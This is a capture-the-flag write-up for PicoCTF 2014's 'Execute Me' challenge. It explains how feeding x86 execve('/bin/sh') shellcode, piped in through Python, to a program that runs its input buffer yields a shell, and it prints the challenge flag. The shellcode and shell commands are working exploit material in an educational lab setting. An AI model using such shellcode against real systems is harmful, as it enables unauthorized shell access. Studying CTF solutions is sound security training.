PicoCTF 2014 Write-ups

Execute Me - 80 (Binary Exploitation)

Writeup by Oksisane

Created: 2014-11-09 13:07:47

Last modified: 2014-11-17 20:58:07

Problem

This program will run whatever you send to it! Try to get the flag! The binary can be found at /home/execute/ on the shell server. The source can be found here.

Hint

You can get the flag in a number of ways, but the easiest would be to run a shell.

Answer

Overview

Use the program to execute some shellcode.

Details

Let's start by running the program on the server. When we run it and enter /bin/sh the following appears:

pico89244@shell:~$ cd /home/execute/
pico89244@shell:/home/execute$ ./execute
/bin/sh
Segmentation fault (core dumped)
pico89244@shell:/home/execute$

Huh, that's not good. Looking a little closer at the code we see this:

read(0, buf, 128);
((function_ptr)buf)();

So the program reads in our buffer and executes it. However, it is not executing the buffer as we would expect, with the system() command to run a command in the shell. Instead, it is executing the assembly commands that we put in the buffer. The hint tells us to run a shell, so we should use shellcode. Shellcode typically is in the form of a bunch of hex values that can be executed to perform a function such as running cat or /bin/sh. Many websites provide shellcode, such as shell-storm. For now, let's use this shellcode to run execve("/bin/sh")

pico89244@shell:/home/execute$ ./execute
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
Segmentation fault (core dumped)
pico89244@shell:/home/execute$

Huh, that still didn't work. Our next task is to pipe the hex values into the program instead of type them in. Right now, the program interprets \x31as 4 separate ascii values instead of ascii value 0x31 (or 49 in base 10). To do this we can use Python:

pico89244@shell:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'") | ./execute
pico89244@shell:/home/execute$

This uses Python to print our hex characters into the program. Note the use of a " to encapsulate the Python code and the ' to encapsulate the print command. This time, we get no error but still no shell! The shell is successfully running with this shellcode but is exiting before we can input anything into it. The final step here is to add a cat to the end of our Python command, which prevents this.

pico89244@shell:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | ./execute
whoami
pico89244
cat flag.txt
shellcode_is_kinda_cool

Our shell runs successfully and we get our flag!

Flag

shellcode_is_kinda_cool